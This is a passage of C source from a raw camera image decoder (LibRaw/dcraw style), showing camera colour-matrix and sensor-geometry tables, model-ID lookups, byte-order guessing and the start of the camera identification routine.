{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A450", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A580", 0, 0xfeb,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony DSLR-A500", 0, 0xfeb,
{ 6046,-1127,-278,-5574,13076,2786,-691,1419,7625 } },
{ "Sony DSLR-A5", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A700", 0, 0,
{ 5775,-805,-359,-8574,16295,2391,-1943,2341,7249 } },
{ "Sony DSLR-A850", 0, 0,
{ 5413,-1162,-365,-5665,13098,2866,-608,1179,8440 } },
{ "Sony DSLR-A900", 0, 0,
{ 5209,-1072,-397,-8845,16120,2919,-1618,1803,8654 } },
{ "Sony ILCA-68", 0, 0,
{ 6435,-1903,-536,-4722,12449,2550,-663,1363,6517 } },
{ "Sony ILCA-77M2", 0, 0,
{ 5991,-1732,-443,-4100,11989,2381,-704,1467,5992 } },
{ "Sony ILCA-99M2", 0, 0, /* Adobe */
{ 6660, -1918, -471, -4613, 12398, 2485, -649, 1433, 6447}},
{ "Sony ILCE-7M2", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-7SM2", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7S", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony ILCE-7R", 0, 0,
{ 4913,-541,-202,-6130,13513,2906,-1564,2151,7183 } },
{ "Sony ILCE-7", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-6300", 0, 0,
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE-6500", 0, 0, /* Adobe */
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE", 0, 0, /* 3000, 5000, 5100, 6000, and QX1 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5N", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5R", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-5T", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3N", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-5", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-6", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-7", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony NEX", 0, 0, /* NEX-C3, NEX-F3 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A33", 0, 0,
{ 6069,-1221,-366,-5221,12779,2734,-1024,2066,6834 } },
{ "Sony SLT-A35", 0, 0,
{ 5986,-1618,-415,-4557,11820,3120,-681,1404,6971 } },
{ "Sony SLT-A37", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A55", 0, 0,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony SLT-A57", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A58", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A65", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A77", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A99", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
};
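/* The first table entry whose prefix matches "make model" (case-insensitive)
   wins, so longer, more specific names must precede shorter ones. trans[]
   holds the camera-to-XYZ matrix scaled by 10000 (e.g. 6461 -> 0.6461).
   Outside of DNG files, a positive t_black forces the black level, a negative
   t_black is used only when the file itself reports a zero black level, and a
   nonzero t_maximum overrides the saturation level. */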
double cam_xyz[4][3];
char name[130];
int i, j;
if(colors>4 || colors < 1) return;
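/* Estimate the black level already reported by the file: the average of the
   four per-channel blacks plus the average of the optional cblack[4] x
   cblack[5] block pattern stored from cblack[6] onward. */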
int bl4=(cblack[0]+cblack[1]+cblack[2]+cblack[3])/4,bl64=0;
if(cblack[4]*cblack[5]>0)
{
for (unsigned c = 0; c < 4096 && c < cblack[4]*cblack[5]; c++)
bl64+=cblack[c+6];
bl64 /= cblack[4]*cblack[5];
}
int rblack = black+bl4+bl64;
sprintf (name, "%s %s", t_make, t_model);
for (i=0; i < sizeof table / sizeof *table; i++)
if (!strncasecmp(name, table[i].prefix, strlen(table[i].prefix))) {
if(!dng_version)
{
if (table[i].t_black>0)
{
black = (ushort) table[i].t_black;
memset(cblack,0,sizeof(cblack));
}
else if(table[i].t_black <0 && rblack == 0 )
{
black = (ushort) (-table[i].t_black);
memset(cblack,0,sizeof(cblack));
}
if (table[i].t_maximum)
maximum = (ushort) table[i].t_maximum;
}
if (table[i].trans[0]) {
for (raw_color = j=0; j < 12; j++)
#ifdef LIBRAW_LIBRARY_BUILD
if(internal_only)
imgdata.color.cam_xyz[0][j] = table[i].trans[j] / 10000.0;
else
imgdata.color.cam_xyz[0][j] =
#endif
((double*)cam_xyz)[j] = table[i].trans[j] / 10000.0;
#ifdef LIBRAW_LIBRARY_BUILD
if(!internal_only)
#endif
cam_xyz_coeff (rgb_cam, cam_xyz);
}
break;
}
}
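/* Fill rgb_cam[] directly from one of the fixed matrices below and clear
   raw_color so that the matrix is actually applied; used for cameras whose
   color conversion is hard-coded instead of derived from a cam_xyz matrix. */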
void CLASS simple_coeff (int index)
{
static const float table[][12] = {
/* index 0 -- all Foveon cameras */
{ 1.4032,-0.2231,-0.1016,-0.5263,1.4816,0.017,-0.0112,0.0183,0.9113 },
/* index 1 -- Kodak DC20 and DC25 */
{ 2.25,0.75,-1.75,-0.25,-0.25,0.75,0.75,-0.25,-0.25,-1.75,0.75,2.25 },
/* index 2 -- Logitech Fotoman Pixtura */
{ 1.893,-0.418,-0.476,-0.495,1.773,-0.278,-1.017,-0.655,2.672 },
/* index 3 -- Nikon E880, E900, and E990 */
{ -1.936280, 1.800443, -1.448486, 2.584324,
1.405365, -0.524955, -0.289090, 0.408680,
-1.204965, 1.082304, 2.941367, -1.818705 }
};
int i, c;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[index][i*colors+c];
}
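/* Sample 16-bit words from the file under both byte orders and keep the one
   whose successive differences are smaller (the smoother interpretation).
   Returns the TIFF byte-order marker: 0x4d4d ("MM", big-endian) or
   0x4949 ("II", little-endian). */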
short CLASS guess_byte_order (int words)
{
uchar test[4][2];
int t=2, msb;
double diff, sum[2] = {0,0};
fread (test[0], 2, 2, ifp);
for (words-=2; words--; ) {
fread (test[t], 2, 1, ifp);
for (msb=0; msb < 2; msb++) {
diff = (test[t^2][msb] << 8 | test[t^2][!msb])
- (test[t ][msb] << 8 | test[t ][!msb]);
sum[msb] += diff*diff;
}
t = (t+1) & 3;
}
return sum[0] < sum[1] ? 0x4d4d : 0x4949;
}
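/* Unpack one row of bps-bit samples from each of the two file offsets and
   return 100*ln(sum0/sum1), where the two sums accumulate absolute differences
   between diagonally adjacent samples of the two rows; presumably a measure of
   the imbalance between the two green channels (hence the name), with a result
   near zero meaning the rows agree. */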
float CLASS find_green (int bps, int bite, int off0, int off1)
{
UINT64 bitbuf=0;
int vbits, col, i, c;
ushort img[2][2064];
double sum[] = {0, 0};
if(width > 2064) return 0.f; // too wide
FORC(2) {
fseek (ifp, c ? off1:off0, SEEK_SET);
for (vbits=col=0; col < width; col++) {
for (vbits -= bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
img[c][col] = bitbuf << (64-bps-vbits) >> (64-bps);
}
}
FORC(width-1) {
sum[ c & 1] += ABS(img[0][c]-img[1][c+1]);
sum[~c & 1] += ABS(img[1][c]-img[0][c+1]);
}
return 100 * log(sum[0]/sum[1]);
}
#ifdef LIBRAW_LIBRARY_BUILD
static void remove_trailing_spaces(char *string, size_t len)
{
if (len < 1)
return; // not needed, because make/model buffers are 64 bytes
string[len - 1] = 0;
if (len < 3)
return; // also not needed
len = strnlen(string, len - 1);
for (int i = len - 1; i >= 0; i--)
{
if (isspace((unsigned char)string[i]))
string[i] = 0;
else
break;
}
}
#endif
/*
Identify which camera created this file, and set global variables
accordingly.
*/
void CLASS identify()
{
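/* Panasonic raw geometry table: each row is keyed by the raw frame size, and
   the remaining columns supply margin/crop adjustments applied later in
   identify(). */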
static const short pana[][6] = {
{ 3130, 1743, 4, 0, -6, 0 },
{ 3130, 2055, 4, 0, -6, 0 },
{ 3130, 2319, 4, 0, -6, 0 },
{ 3170, 2103, 18, 0,-42, 20 },
{ 3170, 2367, 18, 13,-42,-21 },
{ 3177, 2367, 0, 0, -1, 0 },
{ 3304, 2458, 0, 0, -1, 0 },
{ 3330, 2463, 9, 0, -5, 0 },
{ 3330, 2479, 9, 0,-17, 4 },
{ 3370, 1899, 15, 0,-44, 20 },
{ 3370, 2235, 15, 0,-44, 20 },
{ 3370, 2511, 15, 10,-44,-21 },
{ 3690, 2751, 3, 0, -8, -3 },
{ 3710, 2751, 0, 0, -3, 0 },
{ 3724, 2450, 0, 0, 0, -2 },
{ 3770, 2487, 17, 0,-44, 19 },
{ 3770, 2799, 17, 15,-44,-19 },
{ 3880, 2170, 6, 0, -6, 0 },
{ 4060, 3018, 0, 0, 0, -2 },
{ 4290, 2391, 3, 0, -8, -1 },
{ 4330, 2439, 17, 15,-44,-19 },
{ 4508, 2962, 0, 0, -3, -4 },
{ 4508, 3330, 0, 0, -3, -6 },
};
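/* Canon sensor geometry table: rows appear to be keyed by raw width/height,
   with the remaining columns supplying margins, size trims, and per-model
   masking/filter parameters consumed later in identify(). */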
static const ushort canon[][11] = {
{ 1944, 1416, 0, 0, 48, 0 },
{ 2144, 1560, 4, 8, 52, 2, 0, 0, 0, 25 },
{ 2224, 1456, 48, 6, 0, 2 },
{ 2376, 1728, 12, 6, 52, 2 },
{ 2672, 1968, 12, 6, 44, 2 },
{ 3152, 2068, 64, 12, 0, 0, 16 },
{ 3160, 2344, 44, 12, 4, 4 },
{ 3344, 2484, 4, 6, 52, 6 },
{ 3516, 2328, 42, 14, 0, 0 },
{ 3596, 2360, 74, 12, 0, 0 },
{ 3744, 2784, 52, 12, 8, 12 },
{ 3944, 2622, 30, 18, 6, 2 },
{ 3948, 2622, 42, 18, 0, 2 },
{ 3984, 2622, 76, 20, 0, 2, 14 },
{ 4104, 3048, 48, 12, 24, 12 },
{ 4116, 2178, 4, 2, 0, 0 },
{ 4152, 2772, 192, 12, 0, 0 },
{ 4160, 3124, 104, 11, 8, 65 },
{ 4176, 3062, 96, 17, 8, 0, 0, 16, 0, 7, 0x49 },
{ 4192, 3062, 96, 17, 24, 0, 0, 16, 0, 0, 0x49 },
{ 4312, 2876, 22, 18, 0, 2 },
{ 4352, 2874, 62, 18, 0, 0 },
{ 4476, 2954, 90, 34, 0, 0 },
{ 4480, 3348, 12, 10, 36, 12, 0, 0, 0, 18, 0x49 },
{ 4480, 3366, 80, 50, 0, 0 },
{ 4496, 3366, 80, 50, 12, 0 },
{ 4768, 3516, 96, 16, 0, 0, 0, 16 },
{ 4832, 3204, 62, 26, 0, 0 },
{ 4832, 3228, 62, 51, 0, 0 },
{ 5108, 3349, 98, 13, 0, 0 },
{ 5120, 3318, 142, 45, 62, 0 },
{ 5280, 3528, 72, 52, 0, 0 }, /* EOS M */
{ 5344, 3516, 142, 51, 0, 0 },
{ 5344, 3584, 126,100, 0, 2 },
{ 5360, 3516, 158, 51, 0, 0 },
{ 5568, 3708, 72, 38, 0, 0 },
{ 5632, 3710, 96, 17, 0, 0, 0, 16, 0, 0, 0x49 },
{ 5712, 3774, 62, 20, 10, 2 },
{ 5792, 3804, 158, 51, 0, 0 },
{ 5920, 3950, 122, 80, 2, 0 },
{ 6096, 4056, 72, 34, 0, 0 }, /* EOS M3 */
{ 6288, 4056, 266, 36, 0, 0 }, /* EOS 80D */
{ 6880, 4544, 136, 42, 0, 0 }, /* EOS 5D4 */
{ 8896, 5920, 160, 64, 0, 0 },
};
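/* Model-ID lookup tables: unique[] maps Canon body IDs and sonique[] maps
   Sony body IDs (as read from the maker notes) to model names. */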
static const struct {
ushort id;
char t_model[20];
} unique[] = {
{ 0x001, "EOS-1D" },
{ 0x167, "EOS-1DS" },
{ 0x168, "EOS 10D" },
{ 0x169, "EOS-1D Mark III" },
{ 0x170, "EOS 300D" },
{ 0x174, "EOS-1D Mark II" },
{ 0x175, "EOS 20D" },
{ 0x176, "EOS 450D" },
{ 0x188, "EOS-1Ds Mark II" },
{ 0x189, "EOS 350D" },
{ 0x190, "EOS 40D" },
{ 0x213, "EOS 5D" },
{ 0x215, "EOS-1Ds Mark III" },
{ 0x218, "EOS 5D Mark II" },
{ 0x232, "EOS-1D Mark II N" },
{ 0x234, "EOS 30D" },
{ 0x236, "EOS 400D" },
{ 0x250, "EOS 7D" },
{ 0x252, "EOS 500D" },
{ 0x254, "EOS 1000D" },
{ 0x261, "EOS 50D" },
{ 0x269, "EOS-1D X" },
{ 0x270, "EOS 550D" },
{ 0x281, "EOS-1D Mark IV" },
{ 0x285, "EOS 5D Mark III" },
{ 0x286, "EOS 600D" },
{ 0x287, "EOS 60D" },
{ 0x288, "EOS 1100D" },
{ 0x289, "EOS 7D Mark II" },
{ 0x301, "EOS 650D" },
{ 0x302, "EOS 6D" },
{ 0x324, "EOS-1D C" },
{ 0x325, "EOS 70D" },
{ 0x326, "EOS 700D" },
{ 0x327, "EOS 1200D" },
{ 0x328, "EOS-1D X Mark II" },
{ 0x331, "EOS M" },
{ 0x335, "EOS M2" },
{ 0x374, "EOS M3"}, /* temp */
{ 0x384, "EOS M10"}, /* temp */
{ 0x394, "EOS M5"}, /* temp */
{ 0x346, "EOS 100D" },
{ 0x347, "EOS 760D" },
{ 0x349, "EOS 5D Mark IV" },
{ 0x350, "EOS 80D"},
{ 0x382, "EOS 5DS" },
{ 0x393, "EOS 750D" },
{ 0x401, "EOS 5DS R" },
{ 0x404, "EOS 1300D" },
}, sonique[] = {
{ 0x002, "DSC-R1" },
{ 0x100, "DSLR-A100" },
{ 0x101, "DSLR-A900" },
{ 0x102, "DSLR-A700" },
{ 0x103, "DSLR-A200" },
{ 0x104, "DSLR-A350" },
{ 0x105, "DSLR-A300" },
{ 0x106, "DSLR-A900" },
{ 0x107, "DSLR-A380" },
{ 0x108, "DSLR-A330" },
{ 0x109, "DSLR-A230" },
{ 0x10a, "DSLR-A290" },
{ 0x10d, "DSLR-A850" },
{ 0x10e, "DSLR-A850" },
{ 0x111, "DSLR-A550" },
{ 0x112, "DSLR-A500" },
{ 0x113, "DSLR-A450" },
{ 0x116, "NEX-5" },
{ 0x117, "NEX-3" },
{ 0x118, "SLT-A33" },
{ 0x119, "SLT-A55V" },
{ 0x11a, "DSLR-A560" },
{ 0x11b, "DSLR-A580" },
{ 0x11c, "NEX-C3" },
{ 0x11d, "SLT-A35" },
{ 0x11e, "SLT-A65V" },
{ 0x11f, "SLT-A77V" },
{ 0x120, "NEX-5N" },
{ 0x121, "NEX-7" },
{ 0x122, "NEX-VG20E"},
{ 0x123, "SLT-A37" },
{ 0x124, "SLT-A57" },
{ 0x125, "NEX-F3" },
{ 0x126, "SLT-A99V" },
{ 0x127, "NEX-6" },
{ 0x128, "NEX-5R" },
{ 0x129, "DSC-RX100" },
{ 0x12a, "DSC-RX1" },
{ 0x12b, "NEX-VG900" },
{ 0x12c, "NEX-VG30E" },
{ 0x12e, "ILCE-3000" },
{ 0x12f, "SLT-A58" },
{ 0x131, "NEX-3N" },
{ 0x132, "ILCE-7" },
{ 0x133, "NEX-5T" },
{ 0x134, "DSC-RX100M2" },
{ 0x135, "DSC-RX10" },
{ 0x136, "DSC-RX1R" },
{ 0x137, "ILCE-7R" },
{ 0x138, "ILCE-6000" },
{ 0x139, "ILCE-5000" },
{ 0x13d, "DSC-RX100M3" },
{ 0x13e, "ILCE-7S" },
{ 0x13f, "ILCA-77M2" },
{ 0x153, "ILCE-5100" },
{ 0x154, "ILCE-7M2" },
{ 0x155, "DSC-RX100M4" },
{ 0x156, "DSC-RX10M2" },
{ 0x158, "DSC-RX1RM2" },
{ 0x15a, "ILCE-QX1" },
{ 0x15b, "ILCE-7RM2" },
{ 0x15e, "ILCE-7SM2" },
{ 0x161, "ILCA-68" },
{ 0x162, "ILCA-99M2" },
{ 0x163, "DSC-RX10M3" },
{ 0x164, "DSC-RX100M5"},
{ 0x165, "ILCE-6300" },
{ 0x168, "ILCE-6500"},
};
#ifdef LIBRAW_LIBRARY_BUILD
static const libraw_custom_camera_t
const_table[]
#else
static const struct {
unsigned fsize;
ushort rw, rh;
uchar lm, tm, rm, bm, lf, cf, max, flags;
char t_make[10], t_model[20];
ushort offset;
}
table[]
#endif
= {
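// Cameras identified purely by raw file size; fields follow the struct above:
// fsize, raw width/height, left/top/right/bottom margins, load flags,
// CFA pattern code (0x94 RGGB, 0x61 GRBG, 0x49 GBRG, 0x16 BGGR),
// maximum, flags, make, model, and an optional data offset.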
{ 786432,1024, 768, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-080C" },
{ 1447680,1392,1040, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-145C" },
{ 1920000,1600,1200, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-201C" },
{ 5067304,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C" },
{ 5067316,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C",12 },
{ 10134608,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C" },
{ 10134620,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C",12 },
{ 16157136,3272,2469, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-810C" },
{ 15980544,3264,2448, 0, 0, 0, 0, 8,0x61,0,1,"AgfaPhoto","DC-833m" },
{ 9631728,2532,1902, 0, 0, 0, 0,96,0x61,0,0,"Alcatel","5035D" },
{ 31850496,4608,3456, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 4:3" },
{ 23887872,4608,2592, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 16:9" },
// Android raw dumps: id list start
// File size in bytes, horizontal res, vertical res, flags, then Bayer order (e.g. 0x16 = BGGR, 0x94 = RGGB)
{ 1540857,2688,1520, 0, 0, 0, 0, 1,0x61,0,0,"Samsung","S3" },
{ 2658304,1212,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontMipi" },
{ 2842624,1296,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontQCOM" },
{ 2969600,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wMipi" },
{ 3170304,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wQCOM" },
{ 3763584,1584,1184, 0, 0, 0, 0, 96,0x61,0,0,"I_Mobile","I_StyleQ6" },
{ 5107712,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel1" },
{ 5382640,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel2" },
{ 5664912,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 5364240,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 6299648,2592,1944, 0, 0, 0, 0, 1 ,0x16,0,0,"OmniVisi","OV5648" },
{ 6721536,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"OmniVisi","OV56482" },
{ 6746112,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","OneSV" },
{ 9631728,2532,1902, 0, 0, 0, 0, 96,0x61,0,0,"Sony","5mp" },
{ 9830400,2560,1920, 0, 0, 0, 0, 96,0x61,0,0,"NGM","ForwardArt" },
{ 10186752,3264,2448, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX219-mipi 8mp" },
{ 10223360,2608,1944, 0, 0, 0, 0, 96,0x16,0,0,"Sony","IMX" },
{ 10782464,3282,2448, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","MyTouch4GSlide" },
{ 10788864,3282,2448, 0, 0, 0, 0, 0, 0x16,0,0,"Xperia","L" },
{ 15967488,3264,2446, 0, 0, 0, 0, 96,0x16,0,0,"OmniVison","OV8850" },
{ 16224256,4208,3082, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3MipiL" },
{ 16424960,4208,3120, 0, 0, 0, 0, 1, 0x16,0,0,"IMX135","MipiL" },
{ 17326080,4164,3120, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3LQCom" },
{ 17522688,4212,3120, 0, 0, 0, 0, 0,0x16,0,0,"Sony","IMX135-QCOM" },
{ 19906560,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7mipi" },
{ 19976192,5312,2988, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G4" },
{ 20389888,4632,3480, 0, 0, 0, 0, 1, 0x16,0,0,"Xiaomi","RedmiNote3Pro" },
{ 20500480,4656,3496, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX298-mipi 16mp" },
{ 21233664,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7qcom" },
{ 26023936,4192,3104, 0, 0, 0, 0, 96,0x94,0,0,"THL","5000" },
{ 26257920,4208,3120, 0, 0, 0, 0, 96,0x94,0,0,"Sony","IMX214" },
{ 26357760,4224,3120, 0, 0, 0, 0, 96,0x61,0,0,"OV","13860" },
{ 41312256,5248,3936, 0, 0, 0, 0, 96,0x61,0,0,"Meizu","MX4" },
{ 42923008,5344,4016, 0, 0, 0, 0, 96,0x61,0,0,"Sony","IMX230" },
// Android Raw dumps id end
{ 20137344,3664,2748,0, 0, 0, 0,0x40,0x49,0,0,"Aptina","MT9J003",0xffff },
{ 2868726,1384,1036, 0, 0, 0, 0,64,0x49,0,8,"Baumer","TXG14",1078 },
{ 5298000,2400,1766,12,12,44, 2,40,0x94,0,2,"Canon","PowerShot SD300" },
{ 6553440,2664,1968, 4, 4,44, 4,40,0x94,0,2,"Canon","PowerShot A460" },
{ 6573120,2672,1968,12, 8,44, 0,40,0x94,0,2,"Canon","PowerShot A610" },
{ 6653280,2672,1992,10, 6,42, 2,40,0x94,0,2,"Canon","PowerShot A530" },
{ 7710960,2888,2136,44, 8, 4, 0,40,0x94,0,2,"Canon","PowerShot S3 IS" },
{ 9219600,3152,2340,36,12, 4, 0,40,0x94,0,2,"Canon","PowerShot A620" },
{ 9243240,3152,2346,12, 7,44,13,40,0x49,0,2,"Canon","PowerShot A470" },
{ 10341600,3336,2480, 6, 5,32, 3,40,0x94,0,2,"Canon","PowerShot A720 IS" },
{ 10383120,3344,2484,12, 6,44, 6,40,0x94,0,2,"Canon","PowerShot A630" },
{ 12945240,3736,2772,12, 6,52, 6,40,0x94,0,2,"Canon","PowerShot A640" },
{ 15636240,4104,3048,48,12,24,12,40,0x94,0,2,"Canon","PowerShot A650" },
{ 15467760,3720,2772, 6,12,30, 0,40,0x94,0,2,"Canon","PowerShot SX110 IS" },
{ 15534576,3728,2778,12, 9,44, 9,40,0x94,0,2,"Canon","PowerShot SX120 IS" },
{ 18653760,4080,3048,24,12,24,12,40,0x94,0,2,"Canon","PowerShot SX20 IS" },
{ 19131120,4168,3060,92,16, 4, 1,40,0x94,0,2,"Canon","PowerShot SX220 HS" },
{ 21936096,4464,3276,25,10,73,12,40,0x16,0,2,"Canon","PowerShot SX30 IS" },
{ 24724224,4704,3504, 8,16,56, 8,40,0x49,0,2,"Canon","PowerShot A3300 IS" },
{ 30858240,5248,3920, 8,16,56,16,40,0x94,0,2,"Canon","IXUS 160" },
{ 1976352,1632,1211, 0, 2, 0, 1, 0,0x94,0,1,"Casio","QV-2000UX" },
{ 3217760,2080,1547, 0, 0,10, 1, 0,0x94,0,1,"Casio","QV-3*00EX" },
{ 6218368,2585,1924, 0, 0, 9, 0, 0,0x94,0,1,"Casio","QV-5700" },
{ 7816704,2867,2181, 0, 0,34,36, 0,0x16,0,1,"Casio","EX-Z60" },
{ 2937856,1621,1208, 0, 0, 1, 0, 0,0x94,7,13,"Casio","EX-S20" },
{ 4948608,2090,1578, 0, 0,32,34, 0,0x94,7,1,"Casio","EX-S100" },
{ 6054400,2346,1720, 2, 0,32, 0, 0,0x94,7,1,"Casio","QV-R41" },
{ 7426656,2568,1928, 0, 0, 0, 0, 0,0x94,0,1,"Casio","EX-P505" },
{ 7530816,2602,1929, 0, 0,22, 0, 0,0x94,7,1,"Casio","QV-R51" },
{ 7542528,2602,1932, 0, 0,32, 0, 0,0x94,7,1,"Casio","EX-Z50" },
{ 7562048,2602,1937, 0, 0,25, 0, 0,0x16,7,1,"Casio","EX-Z500" },
{ 7753344,2602,1986, 0, 0,32,26, 0,0x94,7,1,"Casio","EX-Z55" },
{ 9313536,2858,2172, 0, 0,14,30, 0,0x94,7,1,"Casio","EX-P600" },
{ 10834368,3114,2319, 0, 0,27, 0, 0,0x94,0,1,"Casio","EX-Z750" },
{ 10843712,3114,2321, 0, 0,25, 0, 0,0x94,0,1,"Casio","EX-Z75" },
{ 10979200,3114,2350, 0, 0,32,32, 0,0x94,7,1,"Casio","EX-P700" },
{ 12310144,3285,2498, 0, 0, 6,30, 0,0x94,0,1,"Casio","EX-Z850" },
{ 12489984,3328,2502, 0, 0,47,35, 0,0x94,0,1,"Casio","EX-Z8" },
{ 15499264,3754,2752, 0, 0,82, 0, 0,0x94,0,1,"Casio","EX-Z1050" },
{ 18702336,4096,3044, 0, 0,24, 0,80,0x94,7,1,"Casio","EX-ZR100" },
{ 7684000,2260,1700, 0, 0, 0, 0,13,0x94,0,1,"Casio","QV-4000" },
{ 787456,1024, 769, 0, 1, 0, 0, 0,0x49,0,0,"Creative","PC-CAM 600" },
{ 28829184,4384,3288, 0, 0, 0, 0,36,0x61,0,0,"DJI" },
{ 15151104,4608,3288, 0, 0, 0, 0, 0,0x94,0,0,"Matrix" },
{ 3840000,1600,1200, 0, 0, 0, 0,65,0x49,0,0,"Foculus","531C" },
{ 307200, 640, 480, 0, 0, 0, 0, 0,0x94,0,0,"Generic" },
{ 62464, 256, 244, 1, 1, 6, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 124928, 512, 244, 1, 1,10, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 1652736,1536,1076, 0,52, 0, 0, 0,0x61,0,0,"Kodak","DCS200" },
{ 4159302,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330" },
{ 4162462,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330",3160 },
{ 2247168,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 3370752,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 6163328,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603" },
{ 6166488,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603",3160 },
{ 460800, 640, 480, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 9116448,2848,2134, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 12241200,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP" },
{ 12272756,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP",31556 },
{ 18000000,4000,3000, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","12MP" },
{ 614400, 640, 480, 0, 3, 0, 0,64,0x94,0,0,"Kodak","KAI-0340" },
{ 15360000,3200,2400, 0, 0, 0, 0,96,0x16,0,0,"Lenovo","A820" },
{ 3884928,1608,1207, 0, 0, 0, 0,96,0x16,0,0,"Micron","2010",3212 },
{ 1138688,1534, 986, 0, 0, 0, 0, 0,0x61,0,0,"Minolta","RD175",513 },
{ 1581060,1305, 969, 0, 0,18, 6, 6,0x1e,4,1,"Nikon","E900" },
{ 2465792,1638,1204, 0, 0,22, 1, 6,0x4b,5,1,"Nikon","E950" },
{ 2940928,1616,1213, 0, 0, 0, 7,30,0x94,0,1,"Nikon","E2100" },
{ 4771840,2064,1541, 0, 0, 0, 1, 6,0xe1,0,1,"Nikon","E990" },
{ 4775936,2064,1542, 0, 0, 0, 0,30,0x94,0,1,"Nikon","E3700" },
{ 5865472,2288,1709, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E4500" },
{ 5869568,2288,1710, 0, 0, 0, 0, 6,0x16,0,1,"Nikon","E4300" },
{ 7438336,2576,1925, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E5000" },
{ 8998912,2832,2118, 0, 0, 0, 0,30,0x94,7,1,"Nikon","COOLPIX S6" },
